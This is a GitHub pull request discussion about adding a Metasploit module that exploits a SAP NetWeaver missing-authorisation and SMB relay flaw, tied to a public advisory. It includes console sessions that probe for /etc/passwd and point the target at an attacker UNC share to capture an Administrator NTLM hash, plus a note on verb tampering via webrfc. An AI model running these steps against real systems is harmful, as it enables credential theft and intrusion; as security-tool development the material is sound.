Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Already on GitHub? Sign in to your account

PFL_CHECK_OS_FILE_EXISTENCE (file existence and SMB relay) #1658

Merged
merged 1 commit into from May 3, 2013

Conversation

Projects
None yet
2 participants
Contributor

nmonkee commented Mar 25, 2013

This module exploits the SAP NetWeaver PFL_CHECK_OS_FILE_EXISTENCE Missing Authorisation Check and SMB Relay Vulnerability. It can be exploited remotely using RFC or webrfc without any additional authorisation by the user. Additionally it can be exploited via transaction SE37.

SAP Note 1591146 / DSECRG-12-009.

ref: http://erpscan.com/advisories/dsecrg-12-009-sap-netweaver-pfl_check_os_file_existence-missing-authorisation-check-and-smb-relay-vulnerability/

@jvazquez-r7 jvazquez-r7 referenced this pull request in nmonkee/metasploit-framework May 2, 2013

Merged

Clean up for sap_soap_rfc_pfl_check_os_file_existence #6

Contributor

jvazquez-r7 commented May 2, 2013

Hi @nmonkee,

In nmonkee#6 I'm trying to cleanup this pull request. Please feel free to review, discuss, test, etc any of the changes proposed. Once you feel comfortable just land the pull request in your repository and this one will be automatically updated. And we'll be ready to merge it.

Also, you might want to check our docs on landing pull requests, https://github.com/rapid7/metasploit-framework/wiki/Landing-Pull-Requests , and would be nice if you have into account the benefits of clean, short, informative merge commit messages: git merge --no-ff --edit and sticking to the usual 50/72 formatting for commits makes for pleasantly readable logs.

Don't hesitate to ask any doubts and, also, if while we work in this modules you feel comfortable enough and have the time to incorporate these recommendations to the existing sap pull requests would accelerate things for sure :-) Anyway will keep helping with these pull requests!

Summary of Changes:

  • Keep modules filenames shorter.
  • Run tools/msftidy.rb, modules must be compliant.
  • Use the guidelines proposed on https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient when using HTTPClient.
  • Since it's an Scanner module, in order to avoid verbosity, try to use print only for the minor information possible (normally success). For the others prints use the verbose print => vprint_*
  • Please add the name of the vulnerability discoverer to the Authors section when available, helps to document modules.
  • Please add known references such as OSVDB, BID or CVE to the References section when available, helps to document modules.
  • When there are required options always make things easier to provide a default option if possible.
  • Parsing profitable information, in this case the dir enumeration from the xml response helps to present better the results. Even when storing the loot is a good thing to store the full response. Even when int his Scanner module the parsed results are only showed to the user when mode VERBOSE = true.

Thanks!

Contributor

jvazquez-r7 commented May 2, 2013

Testing after changes:

  • File exists:
msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > set FILEPATH /etc/passwd
FILEPATH => /etc/passwd
msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > run

[*] 192.168.172.179:8042 - Sending request to check /etc/passwd
[+] 192.168.172.179:8042 - File /etc/passwd exists
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

  • File doesn't exist:
msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > run

[*] 192.168.172.179:8042 - Sending request to check /tmasdfp
[!] 192.168.172.179:8042 - File /tmasdfp DOESN'T exist
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Contributor

jvazquez-r7 commented May 2, 2013

Also, just a question, the original advisory at http://erpscan.com/advisories/dsecrg-12-009-sap-netweaver-pfl_check_os_file_existence-missing-authorisation-check-and-smb-relay-vulnerability/ speaks about "authentication bypass" (maybe via verb tampering?). It isn't available in this module, is it? As far as I've test you need to provide the SAP credentials to execute the abused function. Please let me know if I'm missing something and authentication bypass is provided.

Contributor

nmonkee commented May 3, 2013

  • Windows
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > use auxiliary/server/capture/smb
    msf auxiliary(smb) > set SRVHOST 10.0.7.13
    SRVHOST => 10.0.7.13
    msf auxiliary(smb) > run -j
    [_] Auxiliary module running as background job
    [_] Server started.
    msf > use auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence 
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > set RHOSTS 10.0.7.8
    RHOSTS => 10.0.7.8
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > set RPORT 8000
    RPORT => 8000
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > set FILEPATH \\10.0.7.13\share
    FILEPATH => \10.0.7.13\share
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > run
    [_] SMB Captured - 2013-05-03 08:58:32 +0100
    NTLMv1 Response Captured from 10.0.7.8:50192 - 10.0.7.8 
    USER:Administrator DOMAIN:GATEWAY OS: LM:
    LMHASH:Disabled 
    NTHASH:d9d3c192407bc93152376e16d6a3a3fa9aa53b3cf940f8d4
    [!] 10.0.7.8:8000 - File \10.0.7.13\share DOESN'T exist
    [_] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    
  • Linux
    msf > use auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence 
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > set RHOSTS 10.0.7.50
    RHOSTS => 10.0.7.50
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > set RPORT 8042
    RPORT => 8042
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > set FILEPATH /foo
    FILEPATH => /foo
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > run
    [!] 10.0.7.50:8042 - File /foo DOESN'T exist
    [_] Scanned 1 of 1 hosts (100% complete)
    [_] Auxiliary module execution completed
    
Contributor

nmonkee commented May 3, 2013

To answer your question with regards to authentication bypass and verb tampering. Typically verb tampering bypasses are possible against the J2EE engine by using HEAD requests, which is fine for GET requests where parameters are passed in the URI, but as this is a POST SOAP request and is not against the J2EE engine - I think this is a red herring - could be wrong - its happened before :D

I think this more than likely just refers to an authenticated low priv user being able to execute the RFC without the appropriate authorisations. However, webrfc is also mentioned, which is another connector.

http(s)://<your system>:<your port>/sap/bc/webrfc?_FUNCTION=<RFC FUNCTION NAME>

Calling from this interface allows for the specification of parameters in the URI, and as such could be issued as a HEAD request to facilitate a verb tampering attack.

This RFC is not published by default for Internet access via this connector:

R/3 system message
Function module is not released for the Internet
Diagnosis
You have tried to start the function module from the Internet/Intranet. This is not possible because the function module has not yet been released.
Procedure
For security reasons, you cannot start function modules in the Internet that have not yet been released. The function module must have been explicity released before it can be called from the Internet. To run reports from the Internet, the modules WWW_GET_REPORT and WWW_GET_SELSCREEN must have been released.
Merge pull request #6 from jvazquez-r7/sap_soap_rfc_pfl_check_os_file…
…_existence

Clean up for sap_soap_rfc_pfl_check_os_file_existence
Contributor

jvazquez-r7 commented May 3, 2013

thanks, merging!

@jvazquez-r7 jvazquez-r7 merged commit d8bbd9d into rapid7:master May 3, 2013

1 check passed

default The Travis build passed
Details

@nmonkee nmonkee deleted the nmonkee:sap_soap_rfc_pfl_check_os_file_existence_smb_relay branch May 9, 2013

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment